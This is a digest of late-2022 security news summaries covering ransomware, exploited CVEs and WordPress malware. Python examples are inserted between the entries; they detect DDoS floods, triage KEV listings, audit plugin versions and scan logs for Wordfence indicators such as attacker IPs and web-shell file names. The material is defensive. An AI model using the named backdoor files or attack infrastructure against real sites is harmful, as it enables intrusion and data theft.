                These are the most-read cybersecurity articles that have been published by SecurityAffairs in 2022. 1 – Russia-linked actors may be behind an explosion at a liquefied natural gas plant in Texas. Russian threat actors may be behind the explosion at a liquefied natural gas plant in Texas; the incident took place on June 8. 2 […]

                The post SecurityAffairs Top 10 cybersecurity posts of 2022 appeared first on Security Affairs.

                "

                Autosummary: "


                Ransomware gang apologizes, gives SickKids hospital free decryptor

                exploits
                2023-01-01 https://www.bleepingcomputer.com/news/security/ransomware-gang-apologizes-gives-sickkids-hospital-free-decryptor/
                The LockBit ransomware gang has released a free decryptor for the Hospital for Sick Children (SickKids), saying one of its members violated rules by attacking the healthcare organization. [...] "

                Autosummary: Apology to SickKids on the LockBit data leak site (Source: BleepingComputer). The LockBit operation runs as a Ransomware-as-a-Service, where the operators maintain the encryptors and websites, and the operation's affiliates, or members, breach victims' networks, steal data, and encrypt devices. "


                Ransomware gang cloned victim’s website to leak stolen data

                exploits
                2023-01-01 https://www.bleepingcomputer.com/news/security/ransomware-gang-cloned-victim-s-website-to-leak-stolen-data/
                The ALPHV ransomware operators have gotten creative with their extortion tactic and, in at least one case, created a replica of the victim's site to publish stolen data on it. [...] "

                Autosummary: It currently shows various documents, from memos to staff, payment forms, employee info, data on assets and expenses, financial data for partners, and passport scans. "


                Lockbit apologized for the attack on the SickKids pediatric hospital and releases a free decryptor

                ransomware
                2023-01-01 https://securityaffairs.com/140193/cyber-crime/lockbit-apologized-attack-sickkids.html

                The LockBit ransomware group formally apologized for the attack on the Hospital for Sick Children (SickKids) and released a free decryptor for the hospital. The group is known to […]

                The post Lockbit apologized for the attack on the SickKids pediatric hospital and releases a free decryptor appeared first on Security Affairs.

                "

                Autosummary: "


                Cybercriminals create new methods to evade legacy DDoS defenses

                ciber
                2022-12-30 https://www.helpnetsecurity.com/2022/12/30/cybercriminals-create-new-methods-to-evade-legacy-ddos-defenses/

                The number of DDoS attacks we see around the globe is on the rise, and that trend is likely to continue throughout 2023, according to Corero. We expect to see attackers deploy ever higher rate request-based or packets-per-second attacks. “DDoS attacks have historically focused around sending packets of large sizes with the aim to paralyze and disrupt the internet pipeline by exceeding the available bandwidth. Recent request-based attacks, however, are sending smaller size packets, to … More

                The post Cybercriminals create new methods to evade legacy DDoS defenses appeared first on Help Net Security.

                "

                Autosummary: With the number of recorded attacks on the rise and significant shifts in attackers’ motives and goals, 2023 will require organizations to ensure they have robust DDoS defense in place,” said Lionel Chmilewsky, CEO at Corero Network Security. "
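The shift Corero describes, from large packets that saturate bandwidth to high-rate floods of small packets, is easy to see in numbers. The following is an added example, not Corero's product or Help Net Security's material: it aggregates constructed per-source flow records for one second and applies two alarms, a bits-per-second alarm (what a legacy bandwidth-based defense checks) and a packets-per-second alarm. The flow values and both thresholds are assumptions made for the example.

```python
"""Per-source packet-rate versus bit-rate check over constructed flow records.

Added example, not Corero's product or code. It shows why a defence that
alarms only on bandwidth misses a request-based flood: many small packets
can stay under the bits-per-second line while the packets-per-second rate
is far past what a firewall or server can handle. Flow values and both
thresholds are assumptions made for the example.
"""
from collections import defaultdict

WINDOW_SECONDS = 1

# Constructed 1-second window: (source IP, packets, bytes).
FLOWS = [
    ("198.51.100.7", 900, 1_350_000),      # bulk download, ~1500-byte packets
    ("203.0.113.9", 180_000, 11_520_000),  # flood of 64-byte packets
    ("192.0.2.44", 2_000, 200_000),        # ordinary client
]

BPS_THRESHOLD = 100_000_000  # 100 Mbit/s bandwidth alarm (assumed)
PPS_THRESHOLD = 50_000       # 50 kpps packet-rate alarm (assumed)


def rates(flows, window=WINDOW_SECONDS):
    """Aggregate per source: {src: (packets_per_second, bits_per_second)}."""
    packets = defaultdict(int)
    octets = defaultdict(int)
    for src, p, b in flows:
        packets[src] += p
        octets[src] += b
    return {src: (packets[src] / window, octets[src] * 8 / window) for src in packets}


def classify(flows, bps_limit=BPS_THRESHOLD, pps_limit=PPS_THRESHOLD):
    """Sources over a limit, with which limit(s) they tripped: {src: {"bps", "pps"}}."""
    alarms = {}
    for src, (pps, bps) in rates(flows).items():
        tripped = set()
        if bps > bps_limit:
            tripped.add("bps")
        if pps > pps_limit:
            tripped.add("pps")
        if tripped:
            alarms[src] = tripped
    return alarms


if __name__ == "__main__":
    alarms = classify(FLOWS)
    for src, (pps, bps) in rates(FLOWS).items():
        state = ",".join(sorted(alarms.get(src, ()))) or "ok"
        print(f"{src:14} {pps:>9.0f} pps {bps / 1e6:>7.2f} Mbit/s  {state}")
    # Legacy, bandwidth-only view: disable the pps check and the flood vanishes.
    print("bandwidth-only alarms:", classify(FLOWS, pps_limit=float("inf")))
```

The flood source sends 180,000 packets of 64 bytes, about 92 Mbit/s, so it never crosses the 100 Mbit/s bandwidth alarm; only the packet-rate alarm catches it. In a real deployment the flow records would come from NetFlow/sFlow or a packet capture, and the thresholds would be set from the capacity of the device being protected, not from a fixed number.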


                CISA Warns of Active exploitation of JasperReports Vulnerabilities

                exploits
                2022-12-30 https://thehackernews.com/2022/12/cisa-warns-of-active-exploitation-of.html
                The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added two security flaws from 2018 impacting TIBCO Software's JasperReports product to its Known Exploited Vulnerabilities (KEV) catalog, citing evidence of active exploitation. The flaws, tracked as CVE-2018-5430 (CVSS score: 7.7) and CVE-2018-18809 (CVSS score: 9.9), were addressed by TIBCO in April 2018 and March 2019, "

                Autosummary: "


                Researcher Uncovers Potential Wiretapping Bugs in Google Home Smart Speakers

                exploits
                2022-12-30 https://thehackernews.com/2022/12/researcher-uncovers-potential.html
                A security researcher was awarded a bug bounty of $107,500 for identifying security issues in Google Home smart speakers that could be exploited to install backdoors and turn them into wiretapping devices. The flaws "allowed an attacker within wireless proximity to install a "backdoor" account on the device, enabling them to send commands to it remotely over the internet, access its microphone "

                Autosummary: "


                CISA adds JasperReports vulnerabilities to its Known Exploited Vulnerabilities Catalog

                exploits
                2022-12-30 https://securityaffairs.com/140131/security/known-exploited-vulnerabilities-catalog-jasperreports.html

                US CISA added TIBCO Software’s JasperReports vulnerabilities, tracked as CVE-2018-5430 (CVSS score: 7.7) and CVE-2018-18809 (CVSS score: 9.9), to its Known Exploited Vulnerabilities (KEV) catalog. TIBCO JasperReports is an open-source Java reporting tool for creating and managing reports and dashboards. According to Binding Operational Directive (BOD) 22-01: Reducing the Significant Risk of Known Exploited Vulnerabilities, FCEB […]

                The post CISA adds JasperReports vulnerabilities to its Known Exploited Vulnerabilities Catalog appeared first on Security Affairs.

                "

                Autosummary: "
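Both JasperReports entries above come down to the same operational question: which of the CVEs a scanner has already reported are now in KEV, and when does BOD 22-01 say they must be fixed. The following is an added example, not CISA tooling. The real catalog is published as JSON at https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json and each entry carries at least cveID, vendorProject, product, dateAdded, requiredAction and dueDate; the snapshot, the inventory and the due dates below are constructed for the example and are not the catalog's real values.

```python
"""Cross-check scanner findings against a KEV catalog snapshot.

Added example, not CISA tooling. KEV_SNAPSHOT is a constructed two-entry
snapshot in the shape of the public KEV JSON feed; its dates are
placeholders, not the catalog's values. INVENTORY is a constructed list
of what a vulnerability scanner reported per host.
"""
import json
from datetime import date

KEV_SNAPSHOT = json.loads("""
{
  "title": "constructed KEV snapshot",
  "vulnerabilities": [
    {"cveID": "CVE-2018-5430", "vendorProject": "TIBCO", "product": "JasperReports",
     "dateAdded": "2022-12-29", "requiredAction": "Apply updates per vendor instructions.",
     "dueDate": "2023-01-19"},
    {"cveID": "CVE-2018-18809", "vendorProject": "TIBCO", "product": "JasperReports",
     "dateAdded": "2022-12-29", "requiredAction": "Apply updates per vendor instructions.",
     "dueDate": "2023-01-19"}
  ]
}
""")

INVENTORY = [
    {"host": "reports-01.example.internal", "cves": ["CVE-2018-5430", "CVE-2018-18809"]},
    {"host": "web-02.example.internal", "cves": ["CVE-2018-5430", "CVE-2022-45359"]},
]


def index_kev(snapshot):
    """Map cveID -> catalog entry."""
    return {v["cveID"]: v for v in snapshot["vulnerabilities"]}


def triage(inventory, kev, today):
    """Rows (host, cve, due_date, days_left) for every KEV-listed finding.

    today may be a date or an ISO string. days_left is negative once the
    BOD 22-01 due date has passed; the most overdue rows come first."""
    if isinstance(today, str):
        today = date.fromisoformat(today)
    rows = []
    for asset in inventory:
        for cve in asset["cves"]:
            entry = kev.get(cve)
            if entry is None:
                continue  # not in KEV: still a finding, just no BOD 22-01 deadline
            due = date.fromisoformat(entry["dueDate"])
            rows.append((asset["host"], cve, due, (due - today).days))
    rows.sort(key=lambda r: (r[3], r[0], r[1]))
    return rows


def unlisted(inventory, kev):
    """CVEs from the inventory that this catalog snapshot does not list."""
    return {cve for a in inventory for cve in a["cves"] if cve not in kev}


if __name__ == "__main__":
    kev = index_kev(KEV_SNAPSHOT)
    for host, cve, due, left in triage(INVENTORY, kev, date.today()):
        state = f"{-left} days overdue" if left < 0 else f"{left} days left"
        print(f"{host:30} {cve:16} due {due} ({state})")
    print("not in KEV snapshot:", sorted(unlisted(INVENTORY, kev)))
```

To use it against the live catalog, replace KEV_SNAPSHOT with the parsed feed and INVENTORY with the scanner export; a CVE missing from KEV is not "safe", it only lacks a federally mandated deadline.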


                New Linux malware uses 30 plugin exploits to backdoor WordPress sites

                exploits
                2022-12-30 https://www.bleepingcomputer.com/news/security/new-linux-malware-uses-30-plugin-exploits-to-backdoor-wordpress-sites/
                A previously unknown Linux malware has been exploiting 30 vulnerabilities in multiple outdated WordPress plugins and themes to inject malicious JavaScript. [...] "

                Autosummary: "


                NETGEAR fixes a severe bug in its routers. Patch it asap!

                exploits
                2022-12-30 https://securityaffairs.com/140144/security/netgear-buffer-overflow-routers.html

                Netgear addressed a high-severity bug affecting multiple WiFi router models, including Wireless AC Nighthawk, Wireless AX Nighthawk (WiFi 6), and Wireless AC router models. The vendor only said that the flaw is a pre-authentication buffer overflow vulnerability and urged […]

                The post NETGEAR fixes a severe bug in its routers. Patch it asap! appeared first on Security Affairs.

                "

                Autosummary: Below is the list of fixes released by the company for the specific product models:
                RAX40: fixed in firmware version 1.0.2.60
                RAX35: fixed in firmware version 1.0.2.60
                R6400v2: fixed in firmware version 1.0.4.122
                R6700v3: fixed in firmware version 1.0.4.122
                R6900P: fixed in firmware version 1.3.3.152
                R7000P: fixed in firmware version 1.3.3.152
                R7000: fixed in firmware version 1.0.11.136
                R7960P: fixed in firmware version 1.4.4.94
                R8000P: fixed in firmware version 1.4.4.94
                Below are step-by-step instructions to download the latest firmware for impacted router models: Visit NETGEAR Support. "


                Lockbit ransomware gang claims to have hacked the Port of Lisbon

                exploits ransomware
                2022-12-30 https://securityaffairs.com/140137/cyber-crime/lockbit-group-port-of-lisbon.html

                The website for the Port of Lisbon is still down days after it was the target of a ransomware attack claimed by Lockbit group. The Port of Lisbon is the third-largest port in Portugal and one of the main European ports due to its strategic location. The website of the port was hit by a cyber attack on […]

                The post Lockbit ransomware gang claims to have hacked the Port of Lisbon appeared first on Security Affairs.

                "

                Autosummary: “I would identify, with respect to our ports, cybersecurity, as a significant threat stream and we are of course very focused on defending against it and strengthening our cybersecurity.” "


                Canadian mining firm shuts down mill after ransomware attack

                exploits ransomware
                2022-12-30 https://www.bleepingcomputer.com/news/security/canadian-mining-firm-shuts-down-mill-after-ransomware-attack/
                The Copper Mountain Mining Corporation (CMMC), a Canadian copper mining company in British Columbia, has announced it has become the target of a ransomware attack that impacted its operations. [...] "

                Autosummary: "


                New Linux malware targets WordPress sites by exploiting 30 bugs

                exploits
                2022-12-30 https://securityaffairs.com/140153/cyber-crime/linux-malware-wordpress-websites.html

                A new Linux malware has been exploiting 30 vulnerabilities in outdated WordPress plugins and themes to deploy malicious JavaScripts. Doctor Web researchers discovered a Linux malware, tracked as Linux.BackDoor.WordPressExploit.1, that compromises WordPress websites by exploiting 30 vulnerabilities in multiple outdated plugins and themes. The malware injects malicious JavaScript into the targeted web pages; when users click on the compromised […]

                The post New Linux malware targets WordPress sites by exploiting 30 bugs appeared first on Security Affairs.

                "

                Autosummary: The researchers also spotted a more recent version of the malware that exploits vulnerabilities in the following WordPress plugins and themes: Brizy WordPress Plugin, FV Flowplayer Video Player, WooCommerce, WordPress Coming Soon Page, WordPress theme OneTone, Simple Fields WordPress Plugin, WordPress Delucks SEO plugin, Poll, Survey, Form & Quiz Maker by OpinionStage, Social Metrics Tracker, WPeMatico RSS Feed Fetcher, and Rich Reviews plugin. The researchers noticed that both trojan variants contain unimplemented functionality for hacking the administrator accounts of WordPress websites through a brute-force attack using special dictionaries. "
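The three reports on this malware (The Hacker News, BleepingComputer and Security Affairs above) agree on the precondition: the exploits only work against plugins and themes that were never updated past the fixed version. The first thing a site owner can do is find out what is installed and at what version. The following is an added example, not Doctor Web's or WordPress's own code: it reads the plugin header WordPress itself uses (a top-level PHP file whose leading comment block carries "Plugin Name:" and "Version:"), compares versions numerically rather than as strings, and flags anything below a required minimum. The plugin slugs and the MINIMUM_VERSIONS map are hypothetical, constructed for the example; in use, the map has to be filled from each vendor's advisory.

```python
"""Audit installed WordPress plugin versions against a minimum-version list.

Added example, not Doctor Web's or WordPress's code. The plugins in
SAMPLE_PLUGINS and the versions in MINIMUM_VERSIONS are hypothetical,
constructed for the example; replace the map with the fixed versions from
each vendor's advisory and point audit() at a real wp-content/plugins.
"""
import os
import re
import tempfile

HEADER_RE = re.compile(r"^\s*\*?\s*(Plugin Name|Version)\s*:\s*(.+?)\s*$", re.M)

# Hypothetical plugins, as wp-content/plugins/<slug>/<slug>.php would look.
SAMPLE_PLUGINS = {
    "acme-live-chat": "<?php\n/*\nPlugin Name: Acme Live Chat\nVersion: 8.0.26\n*/\n",
    "acme-rss-fetcher": "<?php\n/**\n * Plugin Name: Acme RSS Fetcher\n * Version: 2.7.1\n */\n",
    "acme-coming-soon": "<?php\n/*\nPlugin Name: Acme Coming Soon\nVersion: 1.10\n*/\n",
}
# Placeholder minimums, not real advisory data.
MINIMUM_VERSIONS = {
    "acme-live-chat": "8.0.27",
    "acme-rss-fetcher": "2.7.0",
    "acme-coming-soon": "1.9",
}


def parse_plugin_header(php_source):
    """Return {"Plugin Name": ..., "Version": ...} from a plugin's header comment."""
    return dict(HEADER_RE.findall(php_source))


def version_tuple(version):
    """'1.10' -> (1, 10): compare numerically; as strings '1.10' < '1.9', which is wrong."""
    return tuple(int(part) for part in re.findall(r"\d+", version))


def scan_plugins(plugins_dir):
    """Yield (slug, name, version) for each plugin directory with a valid header."""
    for slug in sorted(os.listdir(plugins_dir)):
        plugin_dir = os.path.join(plugins_dir, slug)
        if not os.path.isdir(plugin_dir):
            continue
        for filename in sorted(os.listdir(plugin_dir)):
            if not filename.endswith(".php"):
                continue
            with open(os.path.join(plugin_dir, filename), encoding="utf-8", errors="replace") as f:
                header = parse_plugin_header(f.read(8192))  # WordPress reads only the first 8 KB
            if "Plugin Name" in header:
                yield slug, header["Plugin Name"], header.get("Version", "0")
                break  # first file with a header is the plugin's main file


def audit(plugins_dir, minimum_versions):
    """Return {slug: (installed, required)} for plugins below their required version."""
    findings = {}
    for slug, _name, installed in scan_plugins(plugins_dir):
        required = minimum_versions.get(slug)
        if required and version_tuple(installed) < version_tuple(required):
            findings[slug] = (installed, required)
    return findings


def build_sample_tree():
    """Write SAMPLE_PLUGINS into a temporary plugins directory and return its path."""
    root = tempfile.mkdtemp(prefix="wp-plugins-")
    for slug, source in SAMPLE_PLUGINS.items():
        os.makedirs(os.path.join(root, slug))
        with open(os.path.join(root, slug, slug + ".php"), "w", encoding="utf-8") as f:
            f.write(source)
    return root


if __name__ == "__main__":
    plugins_dir = build_sample_tree()  # point this at a real wp-content/plugins instead
    for slug, (installed, required) in audit(plugins_dir, MINIMUM_VERSIONS).items():
        print(f"{slug}: installed {installed}, requires >= {required}")
```

Only the live-chat plugin is reported: the coming-soon plugin at 1.10 is above the required 1.9, which a string comparison would have flagged as outdated. Plugins with no entry in the map are ignored, so an empty result means "nothing known to be outdated", not "nothing vulnerable".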


                LockBit ransomware claims attack on Port of Lisbon in Portugal

                exploits ransomware
                2022-12-30 https://www.bleepingcomputer.com/news/security/lockbit-ransomware-claims-attack-on-port-of-lisbon-in-portugal/
                A cyberattack hitting the Port of Lisbon Administration (APL), the third-largest port in Portugal, on Christmas day has been claimed by the LockBit ransomware gang. [...] "

                Autosummary: The ransomware gang claims to have stolen financial reports, audits, budgets, contracts, cargo information, ship logs, crew details, customer PII (personally identifiable information), port documentation, email correspondence, and more. "


                Cybersecurity and quantum readiness

                ciber
                2022-12-29 https://www.helpnetsecurity.com/2022/12/29/cybersecurity-and-quantum-readiness-video/

                Avast CISO Jaya Baloo explains what quantum computing is, talks about its promises and potential pitfalls, and urges organizations to be pragmatic about preparing for its advent. She lays out the steps that can be taken immediately and those that can be planned for the near and far future. This video was recorded at IRISSCON 2022, an annual conference organized by IRISSCERT. The all-day event focuses on providing attendees with an overview of the current … More

                The post Cybersecurity and quantum readiness appeared first on Help Net Security.

                "

                Autosummary: "


                LCMHS hospital suffered a Ransomware attack at Louisiana hospital that impacted 270,000 patients

                exploits ransomware
                2022-12-29 https://securityaffairs.com/140106/cyber-crime/lcmhs-hospital-ransomware-attack.html

                The Lake Charles Memorial Health System (LCMHS) suffered a ransomware attack that impacted 270,000 patients. The Lake Charles Memorial Health System (LCMHS) disclosed a data breach that affected almost 270,000 patients at its medical centers. The Lake Charles Memorial Health System is the largest not-for-profit community healthcare system in Southwest Louisiana. LCMHS reported the incident to the secretary of the U.S. […]

                The post LCMHS hospital suffered a Ransomware attack at Louisiana hospital that impacted 270,000 patients appeared first on Security Affairs.

                "

                Autosummary: The organization launched an investigation into the incident with the help of forensic experts and discovered that the threat actors had stolen files containing sensitive data, including: full names, physical addresses, dates of birth, medical records, patient identification numbers, health insurance information, payment information, limited clinical information regarding the received care, and Social Security numbers (in some cases). The attackers had no access to electronic medical records. "


                Netgear warns users to patch recently fixed WiFi router bug

                exploits
                2022-12-29 https://www.bleepingcomputer.com/news/security/netgear-warns-users-to-patch-recently-fixed-wifi-router-bug/
                Netgear has fixed a high-severity vulnerability affecting multiple WiFi router models and advised customers to update their devices to the latest available firmware as soon as possible. [...] "

                Autosummary: Firmware version 1.4.4.94. How to update your router's firmware: to download and install the latest firmware for your Netgear router, you have to go through the following steps: Visit NETGEAR Support. "


                Cybersecurity trends and challenges to look out for in 2023

                ciber
                2022-12-29 https://www.welivesecurity.com/videos/cybersecurity-trends-challenges-look-out-2023/

                What are some of the key cybersecurity trends and themes that organizations should have on their radars in 2023?

                The post Cybersecurity trends and challenges to look out for in 2023 appeared first on WeLiveSecurity

                "

                Autosummary: "


                Reported phishing attacks have quintupled

                financial
                2022-12-28 https://www.helpnetsecurity.com/2022/12/28/reported-phishing-attacks-quintupled/

                In the third quarter of 2022, APWG observed 1,270,883 total phishing attacks, the worst quarter for phishing that APWG has ever observed. The total for August 2022 was 430,141 phishing sites, the highest monthly total ever reported to APWG. Reported phishing attacks submitted to APWG have more than quintupled since the first quarter of 2020, when APWG observed 230,554 attacks. The rise in Q3 2022 was attributable, in part, to increasing … More

                The post Reported phishing attacks have quintupled appeared first on Help Net Security.

                "

                Autosummary: "


                Ransomware attack at Louisiana hospital impacts 270,000 patients

                exploits
                2022-12-28 https://www.bleepingcomputer.com/news/security/ransomware-attack-at-louisiana-hospital-impacts-270-000-patients/
                The Lake Charles Memorial Health System (LCMHS) is sending out notices of a data breach affecting thousands of people who have received care at one of its medical centers. [...] "

                Autosummary: These files contained patient information such as: full names, physical addresses, dates of birth, medical records, patient identification numbers, health insurance information, payment information, limited clinical information regarding the received care, and Social Security numbers (in some cases). LCMHS' announcement clarifies that its electronic medical records were out of reach for the network intruders. "


                Royal ransomware claims attack on Intrado telecom provider

                exploits ransomware
                2022-12-28 https://www.bleepingcomputer.com/news/security/royal-ransomware-claims-attack-on-intrado-telecom-provider/
                The Royal Ransomware gang claimed responsibility for a cyber attack against telecommunications company Intrado on Tuesday. [...] "

                Autosummary: Royal ransomware Intrado data leak (BleepingComputer). Likely linked to an early December outage: the date of the initial breach coincides with a widespread outage that impacted all of Intrado's services, including Unified Communication Services, Healthcare, and Unified Communications as a Service (UCaaS). "


                Hackers abuse Google Ads to spread malware in legit software

                exploits
                2022-12-28 https://www.bleepingcomputer.com/news/security/hackers-abuse-google-ads-to-spread-malware-in-legit-software/
                Malware operators have been increasingly abusing the Google Ads platform to spread malware to unsuspecting users searching for popular software products. [...] "

                Autosummary: Products impersonated in these campaigns include Grammarly, MSI Afterburner, Slack, Dashlane, Malwarebytes, Audacity, μTorrent, OBS, Ring, AnyDesk, Libre Office, Teamviewer, Thunderbird, and Brave. "


                SMEs: Boost awareness on cybersecurity – ENISA tools and guidance

                ciber
                2022-12-27 https://www.helpnetsecurity.com/2022/12/27/smes-boost-awareness-on-cybersecurity-video/

                In a time of increased remote work and growing cyber threats, SMEs face major cybersecurity challenges. Low security budgets, lack of employee awareness and management support, lack of cyber skills, and an increase in cyber attacks can seriously impact SMEs’ competitiveness and compromise even the value chain they are connected to. ENISA’s main goal is to raise awareness among SMEs and educate them on cybersecurity hygiene and prominent cybersecurity threats. Georgia Bafoutsou, Cybersecurity Officer at ENISA, presents ENISA’s work to … More

                The post SMEs: Boost awareness on cybersecurity – ENISA tools and guidance appeared first on Help Net Security.

                "

                Autosummary: "


                Enterprises waste money on identity tools they don’t use

                financial
                2022-12-27 https://www.helpnetsecurity.com/2022/12/27/identity-tools-investment/

                Misguided enterprise investment in multiple identity tools is proving insufficient in defending against today’s threat landscape, according to One Identity. 96% of companies report using multiple identity management tools, with 41% deploying at least 25 different systems to manage access rights. However, 70% of companies reported they’re paying for identity tools they’re not actively using. This investment in multiple disparate identity tools is having a direct impact on their overall security posture. Companies have acquired … More

                The post Enterprises waste money on identity tools they don’t use appeared first on Help Net Security.

                "

                Autosummary: “Legacy approaches to identity and access management have caused organizations to adopt multiple identity solutions, and the lack of interoperability between these tools has a direct business and security impact,” said Mark Logan, CEO of One Identity. "


                BTC.com lost $3 million worth of cryptocurrency in cyberattack

                ciber
                2022-12-27 https://www.bleepingcomputer.com/news/security/btccom-lost-3-million-worth-of-cryptocurrency-in-cyberattack/
                BTC.com, one of the world's largest cryptocurrency mining pools, announced it was the victim of a cyberattack that resulted in the theft of approximately $3 million worth of crypto assets belonging to both customers and the company. [...] "

                Autosummary: "


                Hackers steal $8 million from users running trojanized BitKeep apps

                exploits
                2022-12-27 https://www.bleepingcomputer.com/news/security/hackers-steal-8-million-from-users-running-trojanized-bitkeep-apps/
                Multiple BitKeep crypto wallet users reported that their wallets were emptied during Christmas after hackers triggered transactions that didn't require verification. [...] "

                Autosummary: The suspicious transactions spotted by PeckShield include 4373 $BNB, 5.4M $USDT, 196k $DAI, and 1233.21 $ETH. "


                2022 in review: 10 of the year’s biggest cyberattacks

                ciber
                2022-12-27 https://www.welivesecurity.com/2022/12/27/2022-review-10-biggest-cyberattacks/

                The past year has seen no shortage of disruptive cyberattacks – here’s a round-up of some of the worst hacks and breaches that have impacted a variety of targets around the world in 2022

                The post 2022 in review: 10 of the year’s biggest cyberattacks appeared first on WeLiveSecurity

                "

                Autosummary: A CISA alert from September explained that Iran-affiliated threat actors compromised a US municipal government and an aerospace company, among other targets, by exploiting the infamous Log4Shell bug for ransomware campaigns, which isn’t all that common for state-backed entities. Stolen from a Swiss contractor, the data included details of individuals separated from their families due to conflict, migration and disaster, missing persons and their families, and people in detention. In September it was reported that a hacker, potentially a member of Lapsus$, had compromised email and cloud systems, code repositories, an internal Slack account and HackerOne tickets. "


                GuLoader Malware Utilizing New Techniques to Evade Security Software

                exploits
                2022-12-26 https://thehackernews.com/2022/12/guloader-malware-utilizing-new.html
                Cybersecurity researchers have exposed a wide variety of techniques adopted by an advanced malware downloader called GuLoader to evade security software. "New shellcode anti-analysis technique attempts to thwart researchers and hostile environments by scanning entire process memory for any virtual machine (VM)-related strings," CrowdStrike researchers Sarang Sonawane and Donato Onofri said in a "

                Autosummary: "The shellcode employs several anti-analysis and anti-debugging tricks at every step of execution, throwing an error message if the shellcode detects any known analysis or debugging mechanisms," the researchers pointed out. "


                PrivateLoader PPI Service Found Distributing Info-Stealing RisePro Malware

                exploits
                2022-12-26 https://thehackernews.com/2022/12/privateloader-ppi-service-found.html
                The pay-per-install (PPI) malware downloader service known as PrivateLoader is being used to distribute a previously documented information-stealing malware dubbed RisePro. Flashpoint spotted the newly identified stealer on December 13, 2022, after it discovered "several sets of logs" exfiltrated using the malware on an illicit cybercrime marketplace called Russian Market. A C++-based malware, "

                Autosummary: "


                Week in review: LastPass breach disaster, online tracking via UID smuggling, ransomware in 2023

                exploits ransomware
                2022-12-25 https://www.helpnetsecurity.com/2022/12/25/week-in-review-lastpass-breach-disaster-online-tracking-via-uid-smuggling-ransomware-in-2023/

                Here’s an overview of some of last week’s most interesting news, articles, interviews and videos: LastPass says attackers got users’ info and password vault data The information couldn’t come at a worse time, as businesses are winding down their activities and employees and users are thick in the midst of last-minute preparations for end-of-year holidays. New Microsoft Exchange exploit chain lets ransomware attackers in (CVE-2022-41080) Ransomware-wielding attackers are using a new exploit chain that includes … More

                The post Week in review: LastPass breach disaster, online tracking via UID smuggling, ransomware in 2023 appeared first on Help Net Security.

                "

                Autosummary: Here’s an overview of some of last week’s most interesting news, articles, interviews and videos: LastPass says attackers got users’ info and password vault data The information couldn’t come at a worse time, as businesses are winding down their activities and employees and users are thick in the midst of last-minute preparations for end-of-year holidays. "


                Experts warn of attacks exploiting WordPress gift card plugin

                exploits
                2022-12-25 https://securityaffairs.co/wordpress/140004/hacking/wordpress-gift-card-plugin-attacks.html

                Threat actors are actively exploiting a critical vulnerability, tracked as CVE-2022-45359 (CVSS v3: 9.8), in the YITH WooCommerce Gift Cards Premium WordPress plugin, which is installed on over 50,000 websites. The YITH WooCommerce Gift Cards Premium plugin allows websites of online stores to […]

                The post Experts warn of attacks exploiting WordPress gift card plugin appeared first on Security Affairs.

                "

                Autosummary: Below are some files uploaded by threat actors in attacks analyzed by Wordfence: kon.php/1tes.php – this file loads a copy of the “marijuana shell” file manager in memory from a remote location (shell[.]prinsh[.]com); b.php – this file is a simple uploader; admin.php – this file is a password-protected backdoor. Most of the attacks observed by Wordfence originated from the 103.138.108.15 (19604 attacks against 10936 different sites) and 188.66.0.135 (1220 attacks against 928 sites) IP addresses. "
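The Wordfence observations quoted above give a site owner two concrete things to hunt for in web-server logs: requests from the two attacking IP addresses, and requests for the dropped files. The following is an added example, not Wordfence's tooling. The indicator IPs and file names are the ones reported above; the log lines are constructed in Apache combined format for the example. Because admin.php is also a legitimate file under /wp-admin/, the check only treats it as an indicator outside that directory, and it goes one step beyond the listed indicators by flagging any PHP served from wp-content/uploads, since that directory should never execute PHP.

```python
"""Scan web-server access logs for the YITH gift-card attack indicators.

Added example, not Wordfence's tooling. IOC_IPS and IOC_FILES are the
indicators Wordfence reported; SAMPLE_LOG is constructed for the example.
"""
import re

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)

IOC_IPS = {"103.138.108.15", "188.66.0.135"}
IOC_FILES = {"kon.php", "1tes.php", "b.php", "admin.php"}

# Constructed Apache combined-format lines; 203.0.113.5, 198.51.100.23 and
# 192.0.2.77 are documentation addresses standing in for ordinary clients.
SAMPLE_LOG = """\
203.0.113.5 - - [24/Dec/2022:10:01:02 +0000] "GET /wp-admin/admin.php HTTP/1.1" 200 5120
103.138.108.15 - - [24/Dec/2022:10:02:17 +0000] "POST /index.php HTTP/1.1" 302 0
103.138.108.15 - - [24/Dec/2022:10:02:19 +0000] "GET /kon.php HTTP/1.1" 200 812
198.51.100.23 - - [24/Dec/2022:10:05:44 +0000] "GET /wp-content/uploads/2022/12/b.php HTTP/1.1" 200 310
198.51.100.23 - - [24/Dec/2022:10:05:51 +0000] "GET /wp-content/uploads/2022/12/cache.php HTTP/1.1" 200 310
192.0.2.77 - - [24/Dec/2022:10:06:00 +0000] "GET /wp-content/uploads/2022/12/banner.png HTTP/1.1" 200 44120
"""


def parse_line(line):
    """Split one combined-format line into fields, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def reasons_for(ip, path):
    """Set of indicator names matched by one request (empty if clean)."""
    hits = set()
    if ip in IOC_IPS:
        hits.add("ioc-ip")
    # admin.php is legitimate under /wp-admin/; the dropped backdoor lives elsewhere.
    if path.rsplit("/", 1)[-1] in IOC_FILES and not path.startswith("/wp-admin/"):
        hits.add("ioc-file")
    # Upload directories should never serve PHP at all.
    if path.startswith("/wp-content/uploads/") and path.endswith(".php"):
        hits.add("php-in-uploads")
    return hits


def findings(log_text):
    """Return {line_no: (ip, path, reasons)} for every line matching an indicator."""
    out = {}
    for n, line in enumerate(log_text.splitlines(), 1):
        rec = parse_line(line)
        if rec is None:
            continue
        path = rec["path"].split("?", 1)[0]  # drop the query string
        hits = reasons_for(rec["ip"], path)
        if hits:
            out[n] = (rec["ip"], path, hits)
    return out


if __name__ == "__main__":
    for n, (ip, path, hits) in findings(SAMPLE_LOG).items():
        print(f"line {n}: {ip} {path} -> {', '.join(sorted(hits))}")
```

Run against a real log by passing the file's contents to findings(). A hit on the IP indicators only tells you the address touched the site; a hit on ioc-file or php-in-uploads with a 200 status means the site is serving attacker-written code and needs to be treated as compromised, not just patched.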


                Raspberry Robin malware used in attacks against Telecom and Governments

                exploits government
                2022-12-24 https://securityaffairs.co/wordpress/139964/breaking-news/raspberry-robin-targets-telecom-governments.html

